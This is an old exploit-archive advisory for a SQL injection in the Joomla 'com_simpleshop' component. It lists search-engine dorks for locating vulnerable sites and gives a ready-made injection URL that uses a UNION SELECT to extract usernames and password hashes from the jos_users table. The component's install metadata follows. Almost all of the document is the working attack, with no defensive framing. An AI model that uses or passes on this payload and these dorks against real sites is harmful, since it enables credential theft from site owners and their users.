###############################################################
#
# joomla com_simpleshop SQL Injection(section)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl:"com_simpleshop"
#
# DORK 2 : allinurl: "com_simpleshop"section
#
################################################################
EXPLOIT :
index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
################################################################
# S@BUN i AM NOT HACKER S@BUN
################################################################
<mosinstall type="component" version="4.5.2">
<name>simple shop</name>
<author>galore.co.za</author>
<creationDate>July 2007</creationDate>
<copyright>(C) 2000 - 2007 galore.co.za</copyright>
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>
<authorEmail>info@galore.co.za</authorEmail>
<authorUrl>www.galore.co.za</authorUrl>
<version>2.0</version>
# milw0rm.com [2008-02-23]
